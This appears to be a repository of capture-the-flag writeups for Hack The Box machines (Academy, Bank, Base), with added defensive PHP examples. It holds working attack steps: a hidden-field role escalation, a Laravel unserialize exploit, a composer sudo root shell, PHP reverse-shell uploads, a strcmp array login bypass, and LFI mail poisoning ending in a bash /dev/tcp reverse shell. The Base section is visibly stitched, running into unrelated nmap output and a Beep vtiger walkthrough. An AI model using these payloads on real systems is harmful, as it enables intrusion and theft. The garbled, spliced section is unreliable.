Repository layout (every machine directory holds a `README.md` writeup and a `pics/` folder with the screenshots it references):

```
.
├── .gitignore
├── README.md
├── Academy/
│   ├── README.md
│   └── pics/  admin_logged_in.png, admin_php.png, config_php.png, dev_staging.png, htb_academy.png, icon.png, metasploit_module.png, register_php.png
├── Bank/
│   ├── README.md
│   └── pics/  apache_default.png, bank_login.png, chris_login.png, error.png, hint.png, index_php.png, index_php_req.png, logo.png, reverse-shell.png, support_php.png, upload.png
├── Base/
│   ├── README.md
│   └── pics/  login.png, login_directory.png, upload_page.png, uploaded_dir.png, website.png
├── Beep/
│   ├── README.md
│   └── pics/  admin_panel.png, config.png, logo.png, vvtiger.png, website.png
├── Blocky/
│   ├── README.md
│   └── pics/  logo.png, notch_credentials.png, phpmyadmin.png, phpmyadmin_login.png, plugin_editor.png, plugins.png, reverse_shell.png, themes_editor.png, website.png, wordpress_feedback.png, wp_admin_login.png
├── Devel/
│   ├── README.md
│   └── pics/  logo.png, metasploit.png, meterpreter.png, privilege_escalation.png, reverse_shell.png, suggester.png, system_shell.png, welcome.png
├── Doctor/
│   ├── README.md
│   └── pics/  admin_post.png, colorlib.png, logged_in.png, login_page.png, logo.png, posts_test.png, root_shell.png, splunk.png, splunk_loggedin.png, ssti_identifcation.png, website.png
├── FindTheEasyPass/
│   ├── README.md
│   └── pics/  easypassexe.png, gj.png, graph.png, ida.png, location.png, passwordcompare.png, passwordfunction.png, registers.png, wrongpassword.png
├── Guard/
│   ├── README.md
│   └── pics/  command_more.png, more_trick.png
├── Included/
│   ├── README.md
│   └── pics/  etc_passwd.png, reverse_shell.png, website.png
├── Laboratory/
│   ├── README.md
│   └── pics/  dexter_gitlab.png, dexter_sshkey.png, etc_passwd.png, git_logged_in.png, git_server.png, help.png, issue.png, logo.png, main_website.png, move_issue.png, project.png, vulnerability.png
├── Lame/
│   ├── README.md
│   └── pics/  logo.png, searchsploit.png
├── Legacy/
│   ├── README.md
│   └── pics/  logo.png, metasploit_ms08-067.png, module_options.png, system_shell.png
├── Markup/
│   ├── README.md
│   └── pics/  burp-order.png, delivery.png, login.png, order.png, rootshell.png, ssh_key_leak.png, xxe_proof.png
├── Mirai/
│   ├── README.md
│   └── pics/  admin_website.png, logo.png
├── Oopsie/
│   ├── README.md
│   └── pics/  accounting.png, accounts_uri.png, apache_website.png, branding.png, burpsuite_sitemap.png, burpsuite_sniper.png, clients.png, cookies.png, hint_login.png, logged_in.png, login_page.png, shell.png, super_admin_info.png, upload_shell.png, uploads.png, uploads_page.png
├── Optimum/
│   ├── README.md
│   └── pics/  logo.png, website.png
├── Pathfinder/
│   ├── README.md
│   └── pics/  bloodhound-analysis.png, bloodhound_output.png
├── Shield/
│   ├── README.md
│   └── pics/  blog.png, error1.png, error2.png, metasploit_filled_options.png, metasploit_options.png, metasploit_run.png, metasploit_search.png, system_shell.png, webserver.png, wordpress.png, wp_login.png
├── Shocker/
│   ├── README.md
│   └── pics/  logo.png, reverse_shell.png, website.png
├── Vaccine/
│   ├── README.md
│   └── pics/  apache_server.png, crackstation.png, ftp_login.png, megacorp_car_catalogue.png, reverse_shell.png, test_sqli.png
└── Valentine/
    ├── README.md
    └── pics/  apache80.png, decoder.png, dev.png, encoder.png, logo.png
```

`/.gitignore`:

```
ActiveMachines/
```
`/Academy/README.md`:

![](pics/icon.png)

# Academy (Linux)

## Enumeration

```
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The nmap output already says "Did not follow redirect to http://academy.htb". So let's add the name to our `/etc/hosts` file before we start enumerating the webserver.

### Examine Port 80 - Apache Webserver

![](pics/htb_academy.png)

We see the homepage of HTB Academy. It has login and register functionality. But first, let's run gobuster to see if we can find some directories or interesting files:

```
$ gobuster dir -u academy.htb -w /usr/share/wordlists/dirb/big.txt -x php

/admin.php (Status: 200)
/config.php (Status: 200)
/home.php (Status: 302)
/images (Status: 301)
/index.php (Status: 200)
/login.php (Status: 200)
/register.php (Status: 200)
/server-status (Status: 403)
```

Let's check them one by one:

Admin.php: login page

![](pics/admin_php.png)

Config.php: blank for now; probably interesting once we have access to the server.

![](pics/config_php.png)

Home.php: forwards to Login.php, another login page.

![](pics/admin_php.png)

Register.php: registration form.

![](pics/register_php.png)

So let's try to create an account. I used some random values for it.
A habit of mine is to always have Burp Suite running in the background to check requests, especially if they are related to registration or login. Intercepting the request with Burp Suite, we see the following:

```
POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://academy.htb
DNT: 1
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=blm6cuvmr17s6guk92pik7fcs3
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

uid=test2&password=test2&confirm=test2&roleid=0
```

You see that `roleid`? That's weird, isn't it? Looking at the registration form's source (only the relevant part survived in this copy), the field sits right next to the "Repeat Password" input:

```html
Repeat Password
<input type="hidden" name="roleid" value="0">
```

It's a hidden field in the form. I immediately thought about increasing that `roleid` to 1 and trying my account on the admin login, as I might be lucky and be able to control the role of my user with it. And indeed, that works.

![](pics/admin_logged_in.png)

On the TODO list it states two strings, "cry0l1t3 / mrb3n", which seem to be either passwords or usernames, and the task "Fix issue with dev-staging-01.academy.htb", probably a subdomain of the box. Let's add it to the `/etc/hosts` file and inspect the website.

## Gaining an Initial Foothold

![](pics/dev_staging.png)

It seems to be some kind of logging service. Scrolling through the logs, we can see some SQL credentials (`homestead:secret`). Let's note them down; maybe we will need them later.

Scrolling further down, we can see the application name. Apparently it's a Laravel application.

Hm, never heard of it. Let's do some research on it.

*Laravel is a web application framework with expressive, elegant syntax. Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as authentication, routing, sessions, and caching.* (https://laravel.com/docs/4.2/introduction)

A quick Google search on Laravel vulnerabilities/exploits reveals a Metasploit module, `PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)`:

*This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation.*

So, for the exploit we only need the APP_KEY. We have seen this one before! It's contained in the log output!

Fire up msfconsole, use the module and configure it like this:

![](pics/metasploit_module.png)

Now start the exploit and we get a reverse shell:

```
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.26:4444
[*] Command shell session 3 opened (10.10.14.26:4444 -> 10.129.83.160:38564) at 2021-01-22 17:00:18 +0100
[*] Command shell session 4 opened (10.10.14.26:4444 -> 10.129.83.160:38566) at 2021-01-22 17:00:18 +0100

hostname && id
academy
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

The first thing that we can now check is the `.env` file of the Laravel application. It's located in `/var/www/html/academy`.

```
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
```

Here we see a password. However, we cannot connect to the database with it. So I went to the home directory and tried to log in as every user with this password. This was successful with the user `cry0l1t3`. Their home directory also contains the user.txt file!

## Privilege Escalation

### User cry0l1t3

linpeas tells us that there are audit log files that are only readable by us (adm group) and root. This is usually a strong hint, so let's check them out.

*The Linux Audit framework is a kernel feature (paired with userspace tools) that can log system calls, for example opening a file, killing a process or creating a network connection. These audit logs can be used to monitor systems for suspicious activity.*

So let's see if someone used `su` or `sudo` or some other command that requires a password input from the user.

```
cry0l1t3@academy:/var/log/audit$ cat * | grep -E -i 'comm="sudo"|comm="su"'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
```

The data looks like hex. Converting it results in `mrb3n_Ac@d3my!`. That's probably the password of the user `mrb3n`.

### User mrb3n

```
mrb3n@academy:~$ hostname && id
academy
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
```

Again we run linpeas. Nothing found.
So we check the sudoers list. This time we are able to run `composer` as sudo!
A quick look at [GTFOBins](https://gtfobins.github.io/gtfobins/composer/) reveals that it can be exploited to gain root access.
So let's follow it step by step:

First (creates a random directory in /tmp):
```
TF=$(mktemp -d)
```
Then (creates a JSON file containing a scripts object):
```
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
```
And finally (run composer as root to execute the script):
```
sudo composer --working-dir=$TF run-script x
```

And we are root!

```
root@academy:/tmp/tmp.BCWVFCDOXp# hostname && id
academy
uid=0(root) gid=0(root) groups=0(root)
```
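As an added example (not code from the writeup), here is a small PHP script that does the hex conversion programmatically: it parses audit `type=TTY` records, decodes the `data` field with `hex2bin`, and lists the records whose `comm` is a program that prompts for a password. The sample records are constructed (the first is the record above, the second an unrelated one). From a defender's point of view this is the whole problem: `pam_tty_audit` with `log_passwd` enabled records the password keystrokes themselves, so `/var/log/audit` must stay readable by root only; here the `adm` group could read it.

```php
<?php
// Added example, not from the repository: decode keystrokes from
// Linux audit "type=TTY" records. The parsing is generic for
// "key=value" audit lines; only the TTY-specific "data" field is decoded.

// Parse one audit record into an associative array (key => value).
function parse_audit_record(string $line): array
{
    $fields = [];
    // msg=audit(1597199293.906:84): carries the timestamp and serial number
    if (preg_match('/msg=audit\((\d+\.\d+):(\d+)\)/', $line, $m)) {
        $fields['timestamp'] = (float)$m[1];
        $fields['serial'] = (int)$m[2];
    }
    // key=value pairs; the value is either double-quoted or a bare token
    preg_match_all('/(\w+)=("([^"]*)"|\S+)/', $line, $all, PREG_SET_ORDER);
    foreach ($all as $kv) {
        if ($kv[1] === 'msg') {
            continue; // handled above
        }
        $fields[$kv[1]] = ($kv[2][0] === '"') ? $kv[3] : $kv[2];
    }
    return $fields;
}

// Decode the hex "data" field into text; null if it is not valid hex.
function decode_tty_data(string $hex): ?string
{
    if ($hex === '' || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
        return null;
    }
    return hex2bin($hex);
}

// Return the TTY records whose command is one of $programs, each with the
// decoded keystrokes added under 'keystrokes'.
function find_password_prompts(array $lines, array $programs = ['su', 'sudo', 'passwd']): array
{
    $hits = [];
    foreach ($lines as $line) {
        $rec = parse_audit_record($line);
        if (($rec['type'] ?? '') !== 'TTY' || !in_array($rec['comm'] ?? '', $programs, true)) {
            continue;
        }
        $rec['keystrokes'] = decode_tty_data($rec['data'] ?? '');
        $hits[] = $rec;
    }
    return $hits;
}

// Constructed sample: the record from the writeup plus one unrelated record
// ("ls\n" typed into bash), which the filter must ignore.
$sample = [
    'type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A',
    'type=TTY msg=audit(1597199300.000:85): tty pid=2531 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6C730A',
];

foreach (find_password_prompts($sample) as $hit) {
    printf("%s serial=%d uid=%s comm=%s keystrokes=%s\n",
        date('Y-m-d H:i:s', (int)$hit['timestamp']), $hit['serial'],
        $hit['uid'], $hit['comm'], json_encode($hit['keystrokes']));
}
```

Run it with `php audit_tty.php`; in a real investigation the `$sample` array would be replaced by the lines of `/var/log/audit/audit.log`. The trailing `\n` in the decoded data is the Enter key the user pressed after the password.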
`/Bank/README.md`:

![](pics/logo.png)

# Bank (Linux)

## Enumeration

```
rustscan --ulimit 5000 10.129.29.200 -- -sC -sV -o port_scan

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  syn-ack ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Examine Port 80 - Apache2 Server

![](pics/apache_default.png)

When looking at the website, we can only see the Apache2 default page. This happens if you don't modify the `index.html` file in the root directory of Apache. It probably means that we first have to find the correct directory on the webserver. We can do that by using a tool such as gobuster:

```
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u 10.129.29.200

/.htaccess (Status: 403)
/.htaccess.asp (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.asp (Status: 403)
/server-status (Status: 403)
```

So no luck with gobuster... Seems like a dead end. At this point I was super stuck. I had been researching things for many hours without any result for this machine.

### Examine Port 53 - DNS Server

As we got no hint how to proceed on port 80, let's take a look at the DNS server. We can try a few things with nslookup:

```
> SERVER 10.129.29.200
Default server: 10.129.29.200
Address: 10.129.29.200#53
```

```
> 10.129.29.200
** server can't find 200.29.129.10.in-addr.arpa: NXDOMAIN
```

```
> bank.htb
Server:  10.129.29.200
Address: 10.129.29.200#53

Name:    bank.htb
Address: 10.129.29.200
```

But this does not give us any additional info besides the DNS name of the IP, namely `bank.htb` (this was pretty guessy, but as a HTB player you should know the naming conventions). Maybe it's some kind of HTTP virtual host routing.

### Back to Port 80 - DNS name

First let's add the DNS server to our `/etc/resolv.conf` file.

```
nameserver 10.129.29.200
```

Now we should be able to access `bank.htb` via the browser. Alternatively, you could also add the IP with the specific name to the `/etc/hosts` file.

Accessing `http://bank.htb` shows us the following:

![](pics/bank_login.png)

We could immediately start bruteforcing the username/password or use sqlmap on it, but let's first enumerate the new website.

Again we use gobuster for that:

```
gobuster dir -u "http://bank.htb" -w /usr/share/wordlists/dirb/big.txt -x php

/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/assets (Status: 301)
/inc (Status: 301)
/index.php (Status: 302)
/login.php (Status: 200)
/logout.php (Status: 302)
/server-status (Status: 403)
/support.php (Status: 302)
/uploads (Status: 301)
```

This time we find several PHP files (login.php, which we already know, logout.php, index.php and support.php), as well as a directory called uploads. This seems suspicious. Let's check out the PHP files to see if we can use one to upload something.

## Exploitation

The problem is that both support.php and index.php redirect to login.php. However, there is a nice trick to circumvent this using Burp Suite!

If we send a request to index.php and intercept it with Burp, we get this:

![](pics/index_php_req.png)

As response from the server we get the following:

```
HTTP/1.1 302 Found
Date: Sun, 17 Jan 2021 14:32:57 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: login.php
Content-Length: 7322
Connection: close
Content-Type: text/html
```

When we exchange the `302 Found` with `200 OK`, we can trick our browser into not following the `Location` header to `login.php`. Note the `Content-Length: 7322` on the redirect: the server sends the full page body along with it, so the browser only has to be stopped from redirecting. As a result we get to see the index.php file:

![](pics/index_php.png)

We can do the same for support.php:

![](pics/support_php.png)

Here we can see the upload functionality that we were looking for!
Let's try to upload a PHP reverse shell.

![](pics/error.png)

Unfortunately, it tells us that we can only upload images. But there are ways to bypass upload filters if they are not implemented properly.

After trying some techniques and still not having any success, I took a closer look at the server response.

![](pics/hint.png)

The source code contains an HTML comment stating that PHP files should be named `.htb` if you want to upload them for debugging purposes. So I renamed my .php file and uploaded it again. This time it worked!

![](pics/upload.png)

Now, when clicking on the attachment link (or accessing the file in the uploads directory), we get a reverse shell as user `www-data`:

![](pics/reverse-shell.png)

Now that we have access to the server, we can obtain the user flag.

```
$ cat user.txt
872a3bf9df963d168aeb9985f6910e43
```

Afterwards, we have to search for valuable files that help us escalate privileges. In the directory `/var/www/bank`, I found a file called `bankreports.txt` that we have not yet seen.

```
+=================+
| HTB Bank Report |
+=================+

===Users===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 2
Transactions: 8
Balance: 1.337$
```

Maybe this is the password for the user chris on the machine. Let's try it.

Unfortunately, it's not working. But we can try it on the login.php website. Maybe we can gain more information there.

![](pics/chris_login.png)

We now have access to Chris' bank account. The problem is that this won't bring us any further.

So back to enumeration on the webserver...
After searching for a while, I found a file called `user.php` in the directory `/var/www/bank/inc`.
It contains the MySQL login details of root:

```php
$mysql = new mysqli("localhost", "root", "!@#S3cur3P4ssw0rd!@#",
```

Maybe root has used the same password for the server. Let's try to log in as root. But... that does not work either. Seems like a dead end.

The next step was to check for files with the SUID bit set.

```
$ find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
```

The binary `/var/htb/bin/emergency` seemed suspicious. It belonged to root and had the SUID bit set. So I executed it and obtained root privileges (still not sure what the purpose of this binary should have been :D). Now we can also get the root flag!

Alternatively, we could also have changed the password of root by manipulating the `/etc/passwd` file, to which we have write permissions.

## Post-Exploitation

Root flag:
```
# cat root.txt
833ebe63c00b129b3373c3824f133792
```
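As an added example (not code from the repository or from either box), the following PHP puts the server-side mistake behind the Academy `roleid` finding and the one behind the Bank `302`/`200 OK` trick next to hardened versions. The function names, the `ROLE_*` constants and the request body are hypothetical; no framework is assumed.

```php
<?php
// Added example, not from the repository. Two defects seen in these
// writeups, each beside a fix:
//   1. register.php stores a hidden "roleid" field sent by the client
//      (Academy), so editing one request turns a new account into admin.
//   2. index.php sends a 302 to login.php but keeps executing and renders
//      the protected page into the same response (Bank), so a client that
//      rewrites the status line to 200 reads it anyway.

const ROLE_USER = 0;   // hypothetical role ids
const ROLE_ADMIN = 1;

// --- 1. Registration ------------------------------------------------------

// Vulnerable: every posted field, roleid included, is copied into the new
// account record. The hidden input is a client-side suggestion, nothing more.
function register_vulnerable(array $post): array
{
    return [
        'uid'      => $post['uid'],
        'password' => password_hash($post['password'], PASSWORD_DEFAULT),
        'roleid'   => (int)$post['roleid'],
    ];
}

// Hardened: read only an explicit allowlist of fields, require them to be
// strings, and let the server decide the role. Nothing in the request body
// can influence it.
function register_hardened(array $post): array
{
    $uid      = $post['uid'] ?? '';
    $password = $post['password'] ?? '';
    $confirm  = $post['confirm'] ?? '';
    if (!is_string($uid) || !is_string($password) || !is_string($confirm)) {
        throw new InvalidArgumentException('form fields must be strings');
    }
    if ($uid === '' || $password === '' || !hash_equals($password, $confirm)) {
        throw new InvalidArgumentException('invalid registration data');
    }
    return [
        'uid'      => $uid,
        'password' => password_hash($password, PASSWORD_DEFAULT),
        'roleid'   => ROLE_USER,   // never taken from the request
    ];
}

// --- 2. Authentication gate ----------------------------------------------

// Vulnerable: header() only queues the Location header. Execution falls
// through, and whatever the page renders afterwards is sent with the 302.
function require_login_vulnerable(array $session): void
{
    if (empty($session['user_id'])) {
        header('Location: login.php');
    }
}

// Hardened: stop the script right after the redirect so the response body
// is empty no matter what the client does with the status line.
function require_login_hardened(array $session): void
{
    if (empty($session['user_id'])) {
        header('Location: login.php', true, 302);
        exit;
    }
}

// Constructed request body in the same shape as the intercepted one, with
// the hidden field tampered to 1.
$tampered = ['uid' => 'test2', 'password' => 'test2', 'confirm' => 'test2', 'roleid' => 1];

printf("vulnerable: roleid=%d\n", register_vulnerable($tampered)['roleid']);
printf("hardened:   roleid=%d\n", register_hardened($tampered)['roleid']);
```

The registration part runs as a CLI script (`php register_demo.php`) and prints `roleid=1` for the vulnerable handler and `roleid=0` for the hardened one. The two gate functions are meant to be called at the top of a protected page; the only difference between them is the `exit`, which is exactly what the Bank trick relies on being absent.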
`/Base/README.md`:

# Starting Point - Base

## Enumeration

```
$ rustscan 10.10.10.48 -- -sC -sV -o port_scans

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQmgId8Z5lyLG718jzJ9KoLYQPuaKh/Z1++me8L01noJeFuv5RPeqgtoJSeWKcimm7Cw7q3HDUZEHL2LncJIad5v04ma8xgiAG+xUmiO+ntkOff06rtsEx51XRWrbuN4gcTxDCPQQyTJKnTAfleagTbtoWtPNvi82SzaaPyU88nhcn/72USczCeiVfRvawQCcAIHKqUnJzTGlSHAwd6Fj+4sq4CTw0MCrZSTG9JCQmyUVbCFJaF/AtQ0PDOQ/fVhZH8E7E+faAlJKWTYr2sIfQZmC7enT2W82zzWL/JRiQXgAzsI8B6JTJOl3gbmy3+rLY9H+1qztceYKaA8wjFT/5
|   256 65:0c:f7:db:42:03:46:07:f2:12:89:fe:11:20:2c:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3Z4xQdzt1Zxsy5gdOFTrv3k9HtD0UppMhGWFIFWnHZgWAdONjTRzD/ZeiyGeDUgYWGGpQOzl74HXesdUhr+h0=
|   256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINbQMzI8ONrv2TFdy0S8PtObPfizkmQ+217qx1pejwce
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We see that two ports are open: port 80, on which an Apache server is running, and SSH on port 22.

### Examine Port 80 - Apache Server

![](pics/website.png)

We see a website with no specific theme or company relation. It's just offering 5 different navigation options, of which only the Login actually works. Clicking on it, we get forwarded to a PHP login page.

![](pics/login.png)

Instead of trying to bruteforce the login directly, we can start enumerating a bit. What I directly noticed is that the URL of the login is `http://10.10.10.48/login/login.php`. Maybe we can access the parent directory.

Due to a misconfiguration, we can actually access it!

![](pics/login_directory.png)

And due to another developer mistake, there is still the `.swp` file of login.php! This usually happens if the developer edits the file within the directory and then uploads the files to a repository/server without closing the editor first. Let's see if there is any valuable information in that login.php.swp file. Therefore we first download it to our local machine with wget.

```
└──╼ $ file login.php.swp
login.php.swp: Vim swap file, version 8.0
```

Exactly as I thought. The developer used Vim and forgot to close the editor before uploading. Using `cat`/`more` or `strings` on the file reveals the code of the login.php file:

```php
if (!empty($_POST['username']) && !empty($_POST['password'])) {
    require('config.php');
    if (strcmp($username, $_POST['username']) == 0) {
        if (strcmp($password, $_POST['password']) == 0) {
            $_SESSION['user_id'] = 1;
            header("Location: ../upload.php");
        } else {
            print("");
        }
    } else {
        print("");
    }
}
```

The above code checks the username/password combination that the user inputs against the variables that are stored in config.php, to see if they match. The following lines are interesting:

```php
if (strcmp($password, $_POST['password']) == 0) {
if (strcmp($username , $_POST['username']) == 0) {
```

The developer is using `strcmp` to check the username and password, which is insecure and can easily be bypassed. If strcmp is given an array instead of a string to compare against the stored password, it returns NULL (with a warning) rather than an integer. In PHP the `==` operator only checks the value of a variable for equality, and the value of NULL is equal to 0, so the check passes. The correct way to write this would be with the `===` operator, which checks both value and type ([strcmp doc](https://www.php.net/manual/en/function.strcmp.php), [triple equal operator](http://www.dimuthu.org/blog/2008/10/31/triple-equal-operator-and-null-in-php/)). Let's open Burp and catch the login request.

```
POST /login/login.php HTTP/1.1
Host: 10.10.10.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.10.48
DNT: 1
Connection: close
Referer: http://10.10.10.48/login/login.php
Cookie: PHPSESSID=nvtt5pdb6j01rmv842sp9u0n3a
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=test&password=test
```

Change the POST data as follows to bypass the login:

```
username[]=test&password[]=test
```

This converts the variables to arrays and bypasses strcmp. Once logged in, we see there is additional functionality to upload files.

![](pics/upload_page.png)

Now we simply upload a PHP reverse shell. It succeeds! But where is it uploaded to? Let's start gobuster and search for additional directories.
```
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/06 09:54:39 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/_uploaded (Status: 301)
/login (Status: 301)
/server-status (Status: 403)
/static (Status: 301)
```

There is a directory called `_uploaded`. Let's check this one out.

![](pics/uploaded_dir.png)

Now what's left is to start a nc listener on our local machine and then start our reverse shell by either clicking on the shell.php link or by requesting the file through wget/curl.

## Exploitation

Now that we have a reverse shell, let's see what we can exploit to get access to a user or even root.

```
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.48] 49812
Linux base 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:26:48 up 24 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Inspecting the `config.php`, which we previously found in the login directory, we can now see the admin password and username:

```
for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

### Local File Inclusion to Remote Code Execution

When I read some other writeups, I was fascinated by the fact that there exist several ways to pwn the machine. Another way I stumbled upon exploited LFI. As I am a big fan of LFIs I also had to try this one.

So again we go back to our LFI vulnerability:

```
GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
```

From the enumeration part, we know that Port 25 (SMTP) is open. Let's use it to send a mail to the user `asterisk`, which we leaked from the /etc/passwd file.

```
└──╼ $ telnet 10.129.1.226 25
Trying 10.129.1.226...
Connected to 10.129.1.226.
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
EHLO babbadeckl
250-beep.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
VRFY asterisk@localhost         <- verify if this user really exists
252 2.0.0 asterisk@localhost
mail from: babbadeckl@pwn.com
250 2.1.0 Ok
rcpt to: asterisk@localhost
250 2.1.5 Ok
data
354 End data with .
Subject: RCE
                                <- RCE code

.
250 2.0.0 Ok: queued as 86A1ED92FF
quit
221 2.0.0 Bye
Connection closed by foreign host.
```

Afterwards we can check if the email was successfully sent and received:

```
GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00
```

With the LFI, we can leak the email that we have just sent. This also means that our PHP code now gets executed!
```
From babbadeckl@pwn.com  Wed Jan 13 22:48:18 2021
Return-Path:
X-Original-To: asterisk@localhost
Delivered-To: asterisk@localhost.localdomain
Received: from babbadeckl (unknown [10.10.14.50])
	by beep.localdomain (Postfix) with ESMTP id 86A1ED92FF
	for ; Wed, 13 Jan 2021 22:47:17 +0200 (EET)
Subject: RCE
Message-Id: <20210113204725.86A1ED92FF@beep.localdomain>
Date: Wed, 13 Jan 2021 22:47:17 +0200 (EET)
From: babbadeckl@pwn.com
To: undisclosed-recipients:;
```

Now when we append our malicious parameter `babbadeckl`, which we included in the injected PHP code, we have RCE:

```
GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=id


Date: Wed, 13 Jan 2021 22:47:17 +0200 (EET)
From: babbadeckl@pwn.com
To: undisclosed-recipients:;

uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
```

Let's spawn a reverse shell!

```
module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=bash+-i+>%26+/dev/tcp/10.10.14.50/4444+0>%261
```

And we get a shell! Now simply follow the steps from above to obtain root privileges (sudo nmap).

```
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.129.1.226] 47868
bash: no job control in this shell
bash-3.2$ id
